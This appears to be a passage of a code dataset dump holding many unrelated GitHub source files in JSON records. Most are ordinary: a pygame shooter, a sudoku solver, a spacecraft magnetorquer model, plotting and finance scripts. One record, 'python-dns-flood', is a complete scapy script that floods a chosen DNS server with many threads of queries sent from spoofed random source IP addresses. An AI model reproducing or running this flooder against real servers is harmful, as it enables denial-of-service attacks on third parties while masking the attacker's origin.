mid_list:\n get_poscar_file(material_id)\n print(material_id)","repo_name":"xuejunxu/Materials_Project","sub_path":"Get_poscar_from_csv_2.py","file_name":"Get_poscar_from_csv_2.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41306231642","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:Speciallan\n\nimport argparse\nimport sys\nfrom scrapy.cmdline import execute\n\n\ndef main(args):\n\n if args.stage == 1:\n execute(['scrapy', 'crawl', 'product', \"-a\", \"cate_id=1\", \"-a\", \"origin_id=1\"])\n if args.stage == 2:\n execute(['scrapy', 'crawl', 'comment'])\n\n print('加入stage参数')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--stage', '-s', default=0, type=int, help='stage')\n args = parser.parse_args(sys.argv[1:])\n\n main(args)\n\n\n","repo_name":"speciallan/search","sub_path":"scrapy/tutorial/tutorial/spiders/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25013867441","text":"#!./env/bin/python3\n\nfrom scapy.all import *\nfrom time import sleep\nfrom sys import exit as sysexit\nimport string\nimport random\nimport threading\nfrom argparse import ArgumentParser\n\n# check for root\nif not os.geteuid() == 0:\n sysexit(\"\\nOnly root can run this script\\n\")\n\n# init option parser\nparser = ArgumentParser(description='Simple DNS-Flooder')\nparser.add_argument(\"-s\", \"--server\", help='DNS-Server IP Address', required=True)\nparser.add_argument(\"-t\", \"--threads\", type=int, help='Threads to use', required=True)\nargs = parser.parse_args()\n\n# perform dns query\ndef perform_query(dns, domain, sourceIP):\n packet = IP(src=sourceIP, dst=dns) / UDP() / DNS(rd=1, qd=DNSQR(qname=domain))\n send(packet)\n\n# randomized Domain\ndef get_rand_domain():\n letters = string.ascii_lowercase\n return ''.join(random.choice(letters) for i in range(6))\n\n# randomized IP\ndef get_random_IP():\n genIP = \"\"\n for i in range(0, 4):\n part = str(random.randint(1,254))\n genIP += part + \".\"\n return genIP[:-1]\n\n# flood\ndef flood(): \n while True:\n global answ\n domainToUse = get_rand_domain()\n ipToUse = get_random_IP()\n try:\n answ = perform_query(args.server, f\"{domainToUse}.com\", ipToUse)\n except:\n domainToUse = get_rand_domain()\n\n# start threads\ndef start_threads():\n threads = int(args.threads)\n for i in range(1,threads):\n t = threading.Thread(target=flood)\n t.start()\n\n# start here\nif __name__ == \"__main__\":\n print(f\"Starting Flood of {args.server} with {args.threads} Threads in 3 seconds ...\")\n sleep(3)\n start_threads()","repo_name":"0xk1f0/python-dns-flood","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"14685340839","text":"\"\"\"\nCreated: Elias Obreque- -2/26/2020\n\n\"\"\"\nfrom ..Abstract.ComponentBase import ComponentBase\nimport numpy as np\nfrom Library.math_sup.Quaternion import Quaternions\n\nRAD2RPM = 60 / (2 * np.pi)\nRPM2RAD = 1 / RAD2RPM\n# nano Tesla to Tesla\nnT2T = 1e-9\n\n\nclass MTTModel(ComponentBase):\n def __init__(self, mtt_properties):\n ComponentBase.__init__(self, 50)\n self.q_b2c = Quaternions(mtt_properties['q_b2c'])\n self.max_c_am2 = mtt_properties['max_c_am2']\n self.min_c_am2 = mtt_properties['min_c_am2']\n self.bias_c = mtt_properties['bias_c']\n self.rw_stddev_c = mtt_properties['rw_stddev_c']\n self.rw_limit_c = mtt_properties['rw_limit_c']\n self.nr_stddev_c = mtt_properties['nr_stddev_c']\n self.step_width = mtt_properties['prop_step']\n self.historical_mtt_torque_b = []\n self.mtt_torque_b = np.zeros(3)\n\n def main_routine(self, count, sc_isDark):\n\n return\n\n def set_step_width(self, value):\n if value < self.step_width:\n self.step_width = value\n\n def calc_torque(self, control_torque_b, mag_earth_b):\n # Body frame to components frame\n mag_earth_c = self.q_b2c.frame_conv(mag_earth_b)\n\n control_mag_mom_b = np.cross(mag_earth_b, control_torque_b)\n control_mag_mom_c = self.q_b2c.frame_conv(control_mag_mom_b)\n\n for i in range(3):\n if control_mag_mom_c[i] > self.max_c_am2[i]:\n control_mag_mom_c[i] = self.max_c_am2[i]\n elif control_mag_mom_c[i] < self.min_c_am2[i]:\n control_mag_mom_c[i] = self.min_c_am2[i]\n\n mtt_torque_c = np.cross(control_mag_mom_c, nT2T * mag_earth_c)\n\n q_c2b = Quaternions(self.q_b2c.conjugate())\n self.mtt_torque_b = q_c2b.frame_conv(mtt_torque_c)\n return self.mtt_torque_b\n\n def get_torque(self):\n return self.mtt_torque_b\n\n def get_current(self):\n return\n\n def log_value(self):\n self.historical_mtt_torque_b.append(self.mtt_torque_b)\n\n def get_log_values(self, subsys):\n report = {'RWModel' + subsys + '_c(X)[Nm]': np.array(self.historical_mtt_torque_b)[:, 0],\n 'RWModel' + subsys + '_c(Y)[Nm]': np.array(self.historical_mtt_torque_b)[:, 1],\n 'RWModel' + subsys + '_c(Z)[Nm]': np.array(self.historical_mtt_torque_b)[:, 2]}\n return report\n","repo_name":"EliasObreque/SpacecraftSimulator","sub_path":"Components/AOCS/MTTModel.py","file_name":"MTTModel.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40376323031","text":"import json\nimport sys\nfrom typing import Mapping, MutableSequence\n\nfrom .main import main\n\nif len(sys.argv) < 2:\n print(\"provide arguement\")\n exit()\n\nbot = sys.argv[1]\n\n\nclass AttrDict:\n \"\"\"A read-only façade for navigating a JSON-like object\n using attribute notation\n \"\"\"\n\n def __init__(self, mapping):\n self._data = dict(mapping)\n\n def __getattr__(self, name):\n if hasattr(self._data, name):\n return getattr(self._data, name)\n else:\n try:\n return AttrDict.build(self._data[name])\n\n except KeyError:\n raise AttributeError(f\"json object has no attribute {name}\")\n\n @classmethod\n def build(cls, obj):\n if isinstance(obj, Mapping):\n return cls(obj)\n elif isinstance(obj, MutableSequence):\n return [cls.build(item) for item in obj]\n else:\n return obj\n\n\nconfig_dict = json.loads(open(\"moddy/config.json\").read())\nif bot not in config_dict:\n print(\"not a valid bot\")\n exit()\n\nconfig_dict[bot][\"common\"] = config_dict[\"common\"]\nbot_config = AttrDict(config_dict[bot])\n\nmain(bot_config)\n","repo_name":"Hyperx837/Moddy","sub_path":"moddy/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9398412063","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jun 11 14:28:52 2023\r\n\r\n@author: ankro\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport cv2\r\n\r\ndef rmvbgr(image_rgb):\r\n \r\n image_rgb = cv2.imdecode(np.frombuffer(image_rgb, np.uint8), cv2.IMREAD_UNCHANGED)\r\n #image_rgb=cv2.imread(image_rgb)\r\n \r\n rectangle = (60, 110, 280, 260) \r\n \r\n mask = np.zeros(image_rgb.shape[:2], np.uint8) \r\n \r\n \r\n bgdModel = np.zeros((1, 65), np.float64) \r\n fgdModel = np.zeros((1, 65), np.float64) \r\n\r\n cv2.grabCut(image_rgb, mask, rectangle, bgdModel, fgdModel, 1, cv2.GC_INIT_WITH_RECT)\r\n\r\n mask_2 = np.where((mask == 2) | (mask == 0), 0, 1).astype('uint8')\r\n\r\n image_rgd_nobg = image_rgb * mask_2[:, :, np.newaxis]\r\n \r\n img = cv2.resize(image_rgd_nobg,dsize=(150,150))\r\n img = img.reshape((1,) + img.shape)\r\n img = img.astype(np.float32) / 255.0\r\n \r\n return img","repo_name":"AnkitKr0711/Acne_detection_CNN","sub_path":"img_process.py","file_name":"img_process.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"32075545059","text":"from tkinter import *\r\nimport random\r\nimport tkinter\r\nimport tkinter.messagebox\r\nframe=Tk()\r\nmenu=Menu(frame)\r\nfile=Menu(menu)\r\nfile.add_command(label=\"Exit\", command=frame.quit)\r\nfile.add_command(label=\"EASY LEVEL\", command=lambda:easyLvl())\r\nfile.add_command(label=\"MEDIUM LEVEL\", command=lambda:medLvl())\r\nfile.add_command(label=\"HARD LEVEL\", command=lambda:hardLvl())\r\n\r\n\r\nmenu.add_cascade(label=\"Choose difficulty Level \", menu=file)\r\nframe.config(menu=menu)\r\n\r\n\r\n\r\ndef validate(g,number,position):\r\n # Traverse through row\r\n for i in range(len(g[0])):\r\n if g[position[0]][i] == number and position[1] != i:\r\n return False \r\n\r\n # Traverse through col\r\n for i in range(len(g)):\r\n if g[i][position[1]] == number and position[0] != i:\r\n return False \r\n\r\n # Check the mini grid 3x3\r\n minigrid_row = position[1] // 3\r\n minigrid_col = position[0] // 3\r\n for i in range(minigrid_col*3,minigrid_col*3 + 3):\r\n for j in range(minigrid_row*3,minigrid_row*3 + 3):\r\n if g[i][j] == number and (i,j) != position:\r\n return False\r\n\r\n return True\r\n\r\ndef is_empty(g):\r\n for i in range(len(g)):\r\n for j in range(len(g[0])):\r\n if g[i][j] == 0:\r\n return(i,j) \r\n return None\r\n\r\ndef MakeSudoku(n):\r\n grid = [[0 for x in range(9)] for y in range(9)] \r\n for i in range(9):\r\n for j in range(9):\r\n grid[i][j] = 0\r\n \r\n # The range here is the amount\r\n\t# of numbers in the grid\r\n for i in range(n):\r\n #choose random numbers\r\n row = random.randrange(9)\r\n col = random.randrange(9)\r\n num = random.randrange(1,10)\r\n while(not validate(grid,num,(row,col)) or grid[row][col] != 0): #if taken or not valid reroll\r\n row = random.randrange(9)\r\n col = random.randrange(9)\r\n num = random.randrange(1,10)\r\n grid[row][col]= num;\r\n return grid \r\n\r\n\r\ndef easyLvl():\r\n frame.title(\"easy level selected\")\r\n n = 35\r\n grid = MakeSudoku(n) \r\n createGrid(grid)\r\n\r\ndef medLvl():\r\n frame.title(\"medium level selected\")\r\n n=30\r\n grid = MakeSudoku(n)\r\n createGrid(grid)\r\n\r\ndef hardLvl():\r\n frame.title(\"hard level selected\")\r\n n = 23\r\n grid = MakeSudoku(n)\r\n createGrid(grid)\r\n\r\ndef sudoku_solve(g):\r\n find = is_empty(g)\r\n if not find:\r\n return True\r\n else:\r\n row,col = find \r\n \r\n for i in range(1,10):\r\n if validate(g, i, (row,col)):\r\n g[row][col] = i\r\n if sudoku_solve(g):\r\n return True\r\n\r\n g[row][col] = 0\r\n return False\r\ndef sudoku(grid):\r\n sudoku_solve(grid)\r\n createGrid(grid)\r\n\r\ndef submission(grid):\r\n sudoku_solve(grid)\r\n g = grid.copy()\r\n sudoku_solve(g)\r\n if g == grid:\r\n tkinter.messagebox.showinfo(\"Result\", \"congratulations you made it!!\")\r\n #else:\r\n tkinter.messagebox.showerror(\"Result \", \"Sorry incorrect ans!! Please try again\")\r\n \r\n\r\ncolourTxt=\"black\"\r\n#-----------------------------MAIN CODE------------------\r\ndef createGrid(grid):\r\n for rowindex in range (9):\r\n for colindex in range (9):\r\n if (rowindex in (0,1,2,6,7,8) and colindex in (3,4,5) or \\\r\n (rowindex in (3,4,5) and colindex in (0,1,2,6,7,8))):\r\n colour=\"light blue\"\r\n else:\r\n colour=\"white\"\r\n\r\n x = grid[rowindex][colindex]\r\n\r\n if x==0:\r\n colourTxt=\"red\"\r\n ent=Entry(frame,width=8, bg=colour,fg=colourTxt)\r\n ent.grid(row=rowindex, column=colindex, sticky=N+S+E+W)\r\n else:\r\n colourTxt=\"black\" \r\n btn = Label(frame, width=8, bg = colour,text=x, fg= colourTxt)\r\n btn.grid(row=rowindex, column=colindex,sticky=N+S+E+W)\r\n '''btn=Button(frame, width=8, bg=colour, text=x, fg=colourTxt) \r\n btn.grid(row=rowindex, column=colindex, sticky=N+S+E+W)'''\r\n sub = Button(frame, width = 8, text = \"Submit\" ,bg = \"yellow\", command=lambda:submission(grid)) \r\n sub.grid(row= 9,column=0)\r\n sol = Button(frame, width=8, text = \"See Solution\", bg = \"red\", command=lambda:sudoku(grid))\r\n sol.grid(row=9, column=1) \r\n\r\n\r\n\r\ngrid = [[0 for x in range(9)] for y in range(9)] \r\ncreateGrid(grid)\r\nframe.mainloop()","repo_name":"benhar017/Sudoku-Generator-and-Solver","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":4446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11649804957","text":"import plotly.express as px\nimport pandas as pd\nimport numpy as np\n\nimport os\n\nCWD = os.getcwd()\nsim_name = \"bat_size21\"\n# settings\npd.options.plotting.backend = \"plotly\"\nx = pd.read_excel(CWD + f'/Fixed tilt/battery/{sim_name}.xlsx') # x axis profile\ngraph = pd.read_excel(CWD + f'/Fixed tilt/battery/{sim_name}.xlsx')\n\ntrc = 40000\n\ngraph.rename(columns={'excess': 'to_grid'}, inplace=True)\n\ngraph['excess2'] = graph['to_grid'] # creating 2 equal columns, to work with them separately\n\ngraph.excess2 = np.where(graph.to_grid.eq(20000), graph.Solar_cons, graph.excess2)\ngraph['From_Grid'] = np.where(graph['From_Grid'] > trc, trc, graph['From_Grid'])\npd.set_option(\"display.max_rows\", None, \"display.max_columns\", None)\n\nn1 = 0\nn2 = 24 * 365\n\nfig = px.line(x=x['DateTime'][n1:n2], y=[graph['kWcons'][n1:n2], graph['kWsolar'][n1:n2], graph['From_Grid'][n1:n2],\n graph['energy_to_bat'][n1:n2], graph['energy_lost'][n1:n2],\n graph['battery_state_of_charge'][n1:n2]])\n\nfig['data'][0]['name'] = 'Consumed'\nfig['data'][1]['name'] = 'Supplied from PV'\n\nfig['data'][2]['name'] = 'Supplied from Grid'\nfig['data'][3]['name'] = 'Energy delivered to battery'\nfig['data'][4]['name'] = 'Energy lost, due to the grid limitation'\nfig['data'][5]['name'] = 'Battery state of charge'\n\nfig.update_layout(\n xaxis_title=\"Time, days\",\n yaxis_title=\"Energy, kWh\",\n legend_title=\"Legend\",\n legend=dict(\n x=0.8,\n y=1,\n traceorder=\"reversed\",\n title_font_family=\"Times New Roman\",\n font=dict(\n family=\"Courier\",\n size=12,\n color=\"black\"\n ),\n bgcolor=\"LightSteelBlue\",\n bordercolor=\"Black\",\n borderwidth=1\n )\n)\n\nfig.show()\nfig.write_html(\"battery_profile.html\")\n","repo_name":"BakuM2/bat_simple","sub_path":"graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"27765890684","text":"import pygame\nfrom pygame.locals import *\nimport random\nimport start_and_end\n\n#处理文件路径\nfrom pathlib import Path\nimage_path = Path('/sound/')\n\n\nenemy_bullet_list = []\nhero_bullet_list = []\nenemy_plane_list = []\nENEMY_APPEAR = pygame.USEREVENT + 1\n\n\ndef play():\n # pygame.init()\n start_and_end.start_and_end.start()\n window = pygame.display.set_mode((480, 640))\n background = pygame.image.load(r\".\\images\\background.png\")\n window.blit(background, (0, 0))\n\n # plane = pygame.image.load(r\".\\images\\hero1.png\")\n plane1 = HeroPlane(window)\n # plane2 = Plane(window, 1)\n bullets = []\n\n pygame.time.set_timer(ENEMY_APPEAR, random.randint(100, 3000))\n # x = 190\n # y = 516\n while True:\n\n window.blit(background, (0, 0))\n # window.blit(plane.image, (plane.x, plane.y))\n hero_crush(plane1)\n enemy_crush()\n\n plane1.display()\n # plane2.display()\n EnemyPlane.enemies_display()\n Bullet.bullets_display()\n\n # 判断是否是点击了退出按钮\n for event in pygame.event.get():\n # print(event.type)\n if event.type == QUIT:\n print(\"exit\")\n exit()\n if event.type == ENEMY_APPEAR:\n EnemyPlane.count -= 1\n if EnemyPlane.count > 0:\n pygame.time.set_timer(ENEMY_APPEAR, random.randint(100, 1000))\n else:\n pygame.time.set_timer(ENEMY_APPEAR, 300000)\n # print(\"enemy appear\")\n enemy_plane_list.append(EnemyPlane(window))\n\n key_control(plane1)\n # key_control(plane2)\n EnemyPlane.enemies_move()\n Bullet.bullets_move()\n # plane2.bullets_move()\n\n score(window, plane1)\n\n result = judge_win_or_lose(plane1)\n if result is not None:\n break\n\n pygame.display.update()\n\n pygame.time.Clock().tick(60)\n\n start_and_end.start_and_end.end(window,result, EnemyPlane.crushed)\n\n\nclass GameObj(object):\n x = 0\n y = 0\n pace = 0\n image = ''\n\n\nclass Plane(GameObj):\n health = 10\n\n def display(self):\n pass\n\n\nclass HeroPlane(GameObj):\n shoot_int = 2\n\n def __init__(self, win, pnum=0):\n self.x = 480 // 2 - 100\n self.y = 640 - 124\n self.pace = 9\n self.image = pygame.image.load(r\".\\images\\hero1.png\")\n self.window = win\n\n self.player_num = pnum # player number\n\n self.bulpre = 0 # shoot preparation\n\n self.blowIndex = 0 # blow image index\n\n self.bullet_image_name = r\".\\images\\bullet.png\"\n\n self.crushed_image = [self.image,\n pygame.image.load(r\".\\images\\hero_blowup_n3.png\"),\n pygame.image.load(r\".\\images\\hero_blowup_n2.png\"),\n pygame.image.load(r\".\\images\\hero_blowup_n1.png\")]\n \n\n # 击中事宜\n self.health = 10\n self.crushed = 0\n\n def move_left(self):\n if self.x > -50 + self.pace:\n self.x -= self.pace\n else:\n self.x = -50\n\n def move_right(self):\n if self.x < 480 - 50 - self.pace:\n self.x += self.pace\n else:\n self.x = 480 - 50\n\n def move_up(self):\n if self.y > self.pace:\n self.y -= self.pace\n else:\n self.y = 0\n\n def move_down(self):\n if self.y < 640 - 3 - self.pace:\n self.y += self.pace\n else:\n self.y = 640 - 3\n\n def display(self):\n # 将图片进行加载\n self.window.blit(self.crushed_image[self.blowIndex], (self.x, self.y))\n\n if self.blowIndex > 0:\n self.blowIndex -= 1\n\n if self.bulpre > 0:\n self.bulpre -= 1\n\n keyboard = ({\"up\": K_w, \"left\": K_a, \"down\": K_s, \"right\": K_d, \"shoot\": K_j},\n {\"up\": K_UP, \"left\": K_LEFT, \"down\": K_DOWN, \"right\": K_RIGHT, \"shoot\": K_SPACE})\n\n def shoot(self):\n if self.bulpre == 0:\n hero_bullet_list.append(Bullet(self.x+39, self.y, -10, self.window, self.bullet_image_name))\n self.bulpre = self.shoot_int+1\n # self.bullets.append(SelfBullet(self.x + 17, self.y+10, -10, self.window))\n # self.bullets.append(SelfBullet(self.x + 61, self.y+10, -10, self.window))\n\n def get_hit(self):\n self.health -= 1\n self.blowIndex = 3\n\n\nclass EnemyPlane(Plane):\n shoot_int = 5\n count = 40\n crushed = 0\n finished = 0\n\n def __init__(self, screen):\n # 设置飞机默认的位置\n self.x = random.randint(-10, 480-40)\n self.y = -10\n\n # move speed\n self.pace = 3\n\n # 设置要显示内容的窗口\n self.screen = screen\n\n self.imageName = r\".\\images\\enemy0.png\"\n self.image = pygame.image.load(self.imageName)\n self.bullet_image_name = r\".\\images\\bullet1.png\"\n\n # 子弹发射间隔控制\n self.bulpre = 0\n\n def display(self):\n self.screen.blit(self.image, (self.x, self.y))\n # if self.bulpre == 0:\n self.shoot()\n # self.bulpre = self.shoot_int + 1\n # if self.bulpre > 0:\n # self.bulpre -= 1\n\n def shoot(self):\n num = random.randint(1, 50)\n if num > 48:\n # print(\"发射子弹!\")\n newBullet = Bullet(self.x+21, self.y+39, 8, self.screen,\n self.bullet_image_name)\n enemy_bullet_list.append(newBullet)\n\n def move(self):\n self.y += self.pace\n if self.y > 640:\n return 0\n else:\n return 1\n\n @staticmethod\n def enemies_move():\n i = 0\n while i < len(enemy_plane_list):\n if enemy_plane_list[i].move() == 0:\n del enemy_plane_list[i]\n EnemyPlane.finished += 1\n i -= 1\n i += 1\n\n @staticmethod\n def enemies_display():\n for ene in enemy_plane_list:\n ene.display()\n\n\nclass Bullet(GameObj):\n speed = -10\n image = \"\"\n\n def __init__(self, x, y, speed, window, image_name):\n self.x = x\n self.y = y\n self.speed = speed\n self.window = window\n self.image = pygame.image.load(image_name)\n\n def move(self):\n if self.y < -abs(self.speed) or self.y > 640 + abs(self.speed):\n return 0\n else:\n self.y += self.speed\n return 1\n\n def display(self):\n self.window.blit(self.image, (self.x, self.y))\n\n @staticmethod\n def bullets_move():\n i = 0\n while i < len(hero_bullet_list):\n if hero_bullet_list[i].move() == 0:\n del hero_bullet_list[i]\n i -= 1\n i += 1\n\n i = 0\n while i < len(enemy_bullet_list):\n if enemy_bullet_list[i].move() == 0:\n del enemy_bullet_list[i]\n i -= 1\n i += 1\n\n @staticmethod\n def bullets_display():\n for bul in hero_bullet_list:\n bul.display()\n for bul in enemy_bullet_list:\n bul.display()\n\n\ndef key_control(heroPlane):\n\n keys = heroPlane.keyboard[heroPlane.player_num]\n key_pressed = pygame.key.get_pressed()\n if key_pressed[keys[\"up\"]]:\n heroPlane.move_up()\n if key_pressed[keys[\"down\"]]:\n heroPlane.move_down()\n if key_pressed[keys[\"left\"]]:\n heroPlane.move_left()\n if key_pressed[keys[\"right\"]]:\n heroPlane.move_right()\n if key_pressed[keys[\"shoot\"]]:\n heroPlane.shoot()\n print(EnemyPlane.finished)\n # heroPlane.sheBullet()\n\n\ndef hero_crush(heroPlane):\n num = 0\n for i in enemy_bullet_list:\n if abs(i.x - heroPlane.x - 50) + abs(i.y - heroPlane.y - 20) <= 50:\n #被击中\n heroPlane.get_hit()\n # heroPlane.crushed = 1\n break\n num += 1\n if num != len(enemy_bullet_list):\n del (enemy_bullet_list[num])\n #子弹销毁\n\n num = 0\n for i in enemy_plane_list:\n if abs(i.x - heroPlane.x - 50) + abs(i.y - heroPlane.y - 20) <= 50:\n # 被击中\n # heroPlane.crushed = 1\n heroPlane.get_hit()\n break\n num += 1\n if num != len(enemy_plane_list):\n EnemyPlane.finished += 1\n EnemyPlane.crushed += 1\n del (enemy_plane_list[num])\n\n return True\n\n\ndef enemy_crush():\n num = 0\n for i in enemy_plane_list:\n num_j = 0\n for j in hero_bullet_list:\n if abs(i.x - j.x + 25) + abs(i.y - j.y + 20) <= 30:\n EnemyPlane.finished += 1\n EnemyPlane.crushed += 1\n break\n num_j += 1\n if num_j != len(hero_bullet_list):\n del enemy_plane_list[num]\n del hero_bullet_list[num_j]\n\n num += 1\n return False\n\n\ndef score(screen, hero_plane):\n \"\"\"绘制每个飞机的血量信息\"\"\"\n\n # 绘制玩家飞机血量\n score_font = pygame.font.Font(None, 36)\n score_text = score_font.render(\"Health:\"+str(hero_plane.health), True, (128, 128, 128))\n text_rect = score_text.get_rect()\n text_rect.topleft = [10, 10]\n screen.blit(score_text, text_rect)\n\n # 绘制玩家得分\n score_font = pygame.font.Font(None, 36)\n score_text = score_font.render(\"Score{0}:\".format(1)+str(EnemyPlane.crushed), True, (128, 128, 128))\n text_rect = score_text.get_rect()\n text_rect.topleft = [10, 50]\n screen.blit(score_text, text_rect)\n\n # # 绘制敌机飞机血量\n # score_font = pygame.font.Font(None, 36)\n # score_text = score_font.render(str(enemy_plane.blood), True, (128, 128, 128))\n # text_rect = score_text.get_rect()\n # text_rect.topleft = [10, 50]\n # screen.blit(score_text, text_rect)\n\n\ndef judge_win_or_lose(hero_plane):\n \"\"\"用来完成输赢的判断\"\"\"\n\n if hero_plane.health <= 0:\n return \"lose\"\n elif EnemyPlane.finished >= 40:\n return \"win\"\n\n\nif __name__ == \"__main__\":\n play()\n\n","repo_name":"useysw/py_plane","sub_path":"py_plane.py","file_name":"py_plane.py","file_ext":"py","file_size_in_byte":10048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32604264739","text":"#!/usr/bin/env python3\nimport sys\nimport re\n\nif(len(sys.argv) == 1):\n print(f\"error: {sys.argv[0]} needs filenames\", file=sys.stderr)\n sys.exit(1)\n \nfilename = sys.argv[1]\ncnt = 0\nwith open(filename, \"r\", encoding='utf-8') as f:\n for line in f:\n temp = re.findall('[\\d]+', line)\n temp = [int(x) for x in temp]\n cnt += sum(temp)\nprint(cnt)","repo_name":"Shaddock-L/comp9044","sub_path":"wk07/lab07/summing_numbers.py","file_name":"summing_numbers.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32699283426","text":"import math\n\n#printing out initial information for user to pick from\n#the programme uses white space to make text more readable\nx= \" \"\nprint(\"Choose either 'investment' or 'bond' from the menu below to proceed:\")\nprint(f\"\\ninvestment{2*x}-{2*x}to calculate the amount of interest you'll earn on your investment\")\nprint(f\"bond{8*x}-{2*x}to calculate the amount you'll have to pay on a home loan\")\n\n#the user chooses between investment and bond\n#if input is invalid, the programme will ask again until valid answer is inputted\nwhile True:\n choice = input(\"\\nWhat is your choice?\").lower()\n if (choice == \"investment\") or (choice == \"bond\"):\n break\n else:\n print(\"Invalid answer. Please try again.\")\n\n#the following code runs if the user inputs interest\n#calculating the interest depending on whether the user inputs simple or compound\n#displaysthe amount they get back after a given period\nif choice == \"investment\":\n deposit = float(input(\"\\nHow much money are you depositing?\"))\n interest_rate = float(input(\"\\nWhat is the interest rate?\"))\n r=interest_rate/100\n num_years = int(input(\"\\nHow many years do you plan on investing?\"))\n while True:\n interest = input(\"\\nWould you like simple or compound interest?\").lower()\n if (interest == \"simple\") or (interest == \"compound\"):\n break\n else:\n print(\"Invalid answer. Please try again\")\n if interest == \"simple\":\n amount = deposit*(1+r*num_years)\n elif interest == \"compound\":\n amount = deposit*math.pow((1+r),num_years)\n print(\"\\nAfter {} years you will get back £{:.2f}.\".format(num_years,amount))\n\n#the following code runs if the user inputs bond\n#calculating the amount they have to repay each month\nelif choice == \"bond\":\n value_house = float(input(\"\\nWhat is the present value of the house?\"))\n interest_rate = float(input(\"\\nWhat is the interest rate?\"))\n monthly_interest_rate = interest_rate/(12*100)\n num_months = int(input(\"\\nHow many months do you plan to take to repay the bond?\"))\n\n repayment = (monthly_interest_rate * value_house)/(1-(1+monthly_interest_rate)**(-num_months))\n print(\"\\nEach month you will have to repay £{:.2f}.\".format(repayment))\n","repo_name":"jasmine-doyle/Capstone-1","sub_path":"finance_calculators.py","file_name":"finance_calculators.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22419429596","text":"from typing import List\n\n\n# 1. 两数之和\n# 给定一个整数数组 nums 和一个目标值 target,请你在该数组中找出和为目标值的那 两个 整数,并返回他们的数组下标。\n#\n# 你可以假设每种输入只会对应一个答案。但是,数组中同一个元素不能使用两遍。\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n hashMap = {}\n for i in range(len(nums)):\n if hashMap.get(nums[i]):\n hashMap[nums[i]].append(i)\n else:\n hashMap[nums[i]] = [i]\n for num in nums:\n val = hashMap.get(target - num)\n if val is not None:\n if num == target - num:\n if len(val) > 1:\n return val[:2]\n else:\n continue\n else:\n return [hashMap[num][0], val[0]]\n","repo_name":"JackTJC/LeetCode","sub_path":"data_structure/hashtable/TwoSum.py","file_name":"TwoSum.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17261521382","text":"import sys\nsys.stdin = open(\"input.txt\")\n\nT = int(input())\ndef str_dict(string):\n dict = {}\n for i in string:\n if i in dict.keys():\n dict[i] += 1\n continue\n dict[i] = 1\n return dict\n\nfor tc in range(1, T+1):\n str1 = list(set(input()))\n str2 = str_dict(input())\n\n num_of_max = 0\n for i in str1:\n if num_of_max < str2.get(i):\n num_of_max = str2.get(i)\n\n\n print(\"#{} {}\".format(tc, num_of_max))\n\n","repo_name":"Gwanghun-Im/algorithm_study","sub_path":"4865_글자수/sol1.py","file_name":"sol1.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"23495381271","text":"from alibiexplainer.anchor_images import AnchorImages\nimport os\nimport tensorflow as tf\nimport json\nimport numpy as np\nimport dill\nfrom kserve.storage import Storage\n\n\nCIFAR10_EXPLAINER_URI = \"gs://kfserving-examples/models/tensorflow/cifar/explainer-0.9.1\"\nEXPLAINER_FILENAME = \"explainer.dill\"\n\n\ndef test_cifar10_images(): # pylint: disable-msg=too-many-locals\n os.environ.clear()\n alibi_model = os.path.join(\n Storage.download(CIFAR10_EXPLAINER_URI), EXPLAINER_FILENAME\n )\n with open(alibi_model, \"rb\") as f:\n alibi_model = dill.load(f)\n url = \"https://storage.googleapis.com/seldon-models/alibi-detect/classifier/\"\n path_model = os.path.join(url, \"cifar10\", \"resnet32\", \"model.h5\")\n save_path = tf.keras.utils.get_file(\"resnet32\", path_model)\n model = tf.keras.models.load_model(save_path)\n _, test = tf.keras.datasets.cifar10.load_data()\n X_test, _ = test\n X_test = X_test.astype(\"float32\") / 255\n idx = 12\n test_example = X_test[idx: idx + 1]\n anchor_images = AnchorImages(\n lambda x: model.predict(x), alibi_model) # pylint: disable-msg=unnecessary-lambda\n np.random.seed(0)\n explanation = anchor_images.explain(test_example)\n exp_json = json.loads(explanation.to_json())\n assert exp_json[\"data\"][\"precision\"] > 0.9\n","repo_name":"kserve/kserve","sub_path":"python/alibiexplainer/tests/test_anchor_images.py","file_name":"test_anchor_images.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":2598,"dataset":"github-code","pt":"52"} +{"seq_id":"26216254489","text":"import json\n\nfilename = 